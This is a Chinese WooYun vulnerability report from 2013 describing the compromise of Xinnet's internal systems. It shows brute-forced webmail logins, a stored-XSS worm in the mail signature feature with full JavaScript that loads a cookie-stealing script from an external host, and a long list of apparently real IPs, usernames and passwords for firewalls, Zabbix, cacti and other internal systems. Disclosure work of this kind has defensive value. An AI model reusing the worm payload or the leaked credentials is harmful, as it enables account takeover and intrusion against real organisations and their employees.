当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036551

漏洞标题:从一个司机的邮箱开始测试新网(Zabbix、cacti、Zenoss、BSS、防火墙、VPN等N多系统沦陷)

相关厂商:新网华通信息技术有限公司

漏洞作者: 贱心

提交时间:2013-09-09 14:33

修复时间:2013-09-14 14:34

公开时间:2013-09-14 14:34

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-09: 细节已通知厂商并且等待厂商处理中
2013-09-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一直觉得企业的邮箱系统是企业安全环节中一个很脆弱的点,哪怕是互联网公司也同样如此。
Zabbix、cacti、Zenoss、BSS、防火墙、VPN、mrtg监控、网站投诉监查系统、WEARE系统、MRTG服务器、多个机房的跳板机、数码庄园ABC座设备账号密码等等 可导致部分用户vps、域名、邮局等账号密码泄露 至于财务信息 比较敏感 这里就不说了

详细说明:

首先我通过百度、谷歌、大数据库等方式收集了一些新网的邮箱地址,从找到的一些新网的员工姓名又生成了一些邮箱地址
我把这些可能的新网邮箱的用户名整理出来,对其进行了爆破。

http://webmail.xinnet.com


不得不说,很幸运,我爆破得到了一个新网司机的邮箱帐号和密码。

liubing@xinnet.com   123456


可能有的同学觉得一个司机的邮箱能有什么用,里面不会有什么重要的东西的
里面确实没什么重要的邮件 ps:新网司机的工资挺低的
但我们找到了这个

QQ截图20130909115325.jpg


好吧 这可比我辛辛苦苦收集的多了好几倍
把800多个邮箱拿到burp上再爆破一次
额~ 吓我一跳啊 800多个邮箱竟然有近百个是弱口令 员工们这安全意识大大的有待提高啊

QQ截图20130909141126.jpg


这里就帮这些同学打码了 免的挨骂 不过如果你是弱口令 记得改密码哦
在近百个邮箱里找到了几个技术人员的邮箱,只找到了个zabbix,看来这几个是底层的员工
可是就这么爆破点儿邮箱,找了个zabbix就提交上来多丢人啊
我们的目标是运维的同学 他们掌握这大量系统的权限
OK 我们继续
仔细看了下新网的邮箱系统 发现应该可以直接写html

QQ截图20130909120417.jpg


貌似还有签名,good 我们可以把签名里写上xss代码,这样他下次写邮件给其他同事 他的同事也会中招
等等 我们看下修改签名 发现无token等验证 而且get请求也可以 那我们岂不是可以构造个蠕虫了?!

http://webmail.xinnet.com/app/mailset/mailSign/operate?method=addMailSignature&sigId=&isHtml=false&sigSubject=%E9%BB%98%E8%AE%A4%E7%AD%BE%E5%90%8D&defaultSig=true&signatureContent=签名内容


先试试可不可以xss吧 我把他的默认签名修改为

<script src=http://xssplatform.xss.com/xss?1378700262></script>


我们发一封测试邮件试试

QQ截图20130909121853.jpg


你妹啊,这是什么情况?怎么收到的是一个ip的cookie?
难道读邮件的时候是在这个ip上读?那我们岂不是无法获取到webmail.xinnet.com域上的cookie么(看来新网的技术人员是考虑到xss的)
失败了 难道就这样结束了么?
好吧 把人家签名改回去 走人吧
可天无绝人之路 就在再次打开邮件签名设置的时候 我收到了一条cookie

location : http://webmail.xinnet.com/app/mailset/mailSign/set


可以确认这里有个xss 那就好办了
我们来写个超简单的蠕虫吧

if(localStorage.getItem('a')!='1'){
s=document.createElement("iframe");s.style.display="none";s.src="http://webmail.xinnet.com/app/mailset/mailSign/operate?method=addMailSignature&sigId=&isHtml=false&sigSubject=%E9%BB%98%E8%AE%A4%E7%AD%BE%E5%90%8D&defaultSig=true&signatureContent=%3cscript%20src%3dhttp:%2f%2fxssplatform.xss.com%2fxss%3f1378195725%3e%3c%2fscript%3e";document.body.appendChild(s);
localStorage.setItem('a','1');
}
b=document.createElement("iframe");b.style.display="none";b.src="http://webmail.xinnet.com/app/mailset/mailSign/set";document.body.appendChild(b);


QQ截图20130909123219.jpg


上图是收获的cookie
那这有什么用呢?看看下面我们在邮箱内容里找到的收获吧

mrtg监控流量:http://123.100.0.40 gzidc/gzidc
url:http://58.30.217.121/index.php?reconnect=1
用户名:zabbix监控
密码:xinnet123
http://114.112.53.50/cacti
用户名:cactimonitor
密码:  xinnet123
http://121.14..187/complaintCenter/
http://121.14.4.178/complaintCenter/
http://121.14.4.229/ComplaintCenter/portal/jsp/login/login.jsp
http://121.14.4.228/ComplaintCenter/portal/jsp/login/login.jsp
账号:zbliuhui@xinnet.com
密码:1
防火墙地址:
http://114.112.53.45:28099/
用户名:xinnet
密码:xinnet123!@#
http://61.155.153.248:28099
用户名:xinnet
密码:xinnet123!@#
http://58.30.238.114:28099
用户名:xinnet
密码:xinnet123!@#
http://monitor.300.cn:8080/zport/dmd/Events/evconsole
U:  viewer
P:   viewer#.)
http://fuwu.myxinnet.com/
王斌47
赫英惠
霍森
赵越
闫均
123465
http://yy.myxinnet.com/DisposeSearch.aspx?InspectId=X121031173
test
123456
李荣
123456
登录weare.xinnet.com,用户名:gd-shiyongqi,密码:gd-shiyongqi


还有好多系统 就不全列出来了
如果是真正的骇客 还会对其他地方下手 可想而知会有什么危害。
蠕虫已关闭不会继续传播和获取cookie 不过还是要清掉签名里xss代码

漏洞证明:

QQ截图20130909132120.jpg

QQ截图20130909134331.jpg

QQ截图20130909135301.jpg

QQ截图20130909135536.jpg

QQ截图20130909135915.jpg

QQ截图20130909140105.jpg

QQ截图20130909140140.jpg

QQ截图20130909140609.jpg

QQ截图20130909140905.jpg


QQ截图20130909113033.jpg

QQ截图20130909141632.jpg


QQ截图20130909141831.jpg


QQ截图20130909142212.jpg


QQ截图20130909142034.jpg


还有好多系统 就不全列出来了

修复方案:

也许新网运维们看到这个会痛恨我
但总比有一天真的遇到骇客了 遭受损失才加强安全好得多
司机是无辜的 只是躺枪 弱口令的邮箱太多了

版权声明:转载请注明来源 贱心@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-14 14:34

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

暂无